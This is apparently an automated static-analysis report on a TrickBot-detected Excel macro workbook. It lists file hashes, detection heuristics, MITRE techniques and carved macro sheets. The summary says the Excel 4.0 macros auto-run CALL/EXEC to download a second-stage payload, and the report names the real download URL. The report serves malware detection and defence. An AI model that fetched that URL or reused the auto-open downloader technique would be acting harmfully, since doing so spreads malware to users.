TrickBot — Office (OOXML) / .XLSM malware analysis

Static analysis result for SHA-256 80f34ac8c2bb698f…

MALICIOUS

Office (OOXML) / .XLSM

92.4 KB Created: 2006-09-16 00:00:00 UTC Authoring application: Microsoft Excel 14.0300
MD5: fe721f290080445685d355d94c3611ec SHA-1: 0f34b98a819170e58dbf849d64ab0ac2a8f2f68d SHA-256: 80f34ac8c2bb698ff0c2754f44d18e84452135b31a5a12d2665da6e9204c780f
242 Risk Score

Malware Insights

TrickBot · confidence 95%

MITRE ATT&CK
T1059.005 Visual Basic T1203 Exploitation for Client Execution

The file is an XLSM document containing Excel 4.0 macros, which are known to be used for malicious purposes. The macros utilize dangerous functions like CALL and EXEC to download and run a second-stage payload from the URL http://living-traditions.com/blogs/click.php. ClamAV detection further confirms this as TrickBot.

Heuristics 5

  • Excel 4.0 macro sheet (3 sheet(s)) critical OOXML_XLM_MACROSHEET
    Spreadsheet contains an Excel 4.0 (XLM) macro sheet — XLM was a major Office malware vector during 2020-2022 and evaded many VBA-focused controls before Microsoft tightened XLM defaults. Even legitimate XLM use is rare in modern workbooks.
  • Excel 4.0 Auto_Open defined name critical OOXML_XLM_AUTOOPEN_DEFINEDNAME
    Workbook defines _xlnm.Auto_Open or _xlnm.Auto_Close while containing an XLM macro sheet. This is the OOXML/XLSB auto-execution shape for Excel 4.0 macros.
  • Dangerous XLM formula APIs: HALT, CALL, EXEC critical OOXML_XLM_DANGEROUS_FN
    Excel 4.0 macro sheet uses formula APIs that call directly into Win32 (=CALL/=EXEC/=REGISTER/=FORMULA). These are the primitives used to download payloads, write files, and start processes from an XLM macro without invoking VBA.
  • ClamAV: Xls.Downloader.Trickbot07210-9880007-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Xls.Downloader.Trickbot07210-9880007-0
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://living-traditions.com/blogs/click.php
    • http://schemas.openxmlformats.org/spreadsheetml/2006/main
    • http://schemas.microsoft.com/office/excel/2006/main
    • http://schemas.openxmlformats.org/officeDocument/2006/relationships
    • http://schemas.openxmlformats.org/markup-compatibility/2006
    • http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac

Extracted artifacts 4

Files carved from inside the sample during analysis.

FilenameKindSourceSize
emf_00.emf
ab58818ae1864807b22f8a58a75f7fa8703ecb19a2352bdb47469f366b868e59		 ooxml-emf OOXML EMF part: xl/media/image1.emf 1108 bytes
xlm_sheet_00.xml
e4b281892d0ea349b67e22f5137ff45445837a231636a77def5d03453653a180		 xlm-macrosheet OOXML XLM macro sheet: xl/macrosheets/intlsheet3.xml 1320 bytes
xlm_sheet_01.xml
dc6f94d6a4ba861acb967e43bffdd40434a4af702aa49fecd339a534a914cf25		 xlm-macrosheet OOXML XLM macro sheet: xl/macrosheets/intlsheet2.xml 1296 bytes
xlm_sheet_02.xml
8faff306084010389946628f47b22e9cb5995393bc56355b17f2d18c3fd7944c		 xlm-macrosheet OOXML XLM macro sheet: xl/macrosheets/intlsheet1.xml 1246 bytes

Open this report in the interactive analyzer, or submit your own file for analysis.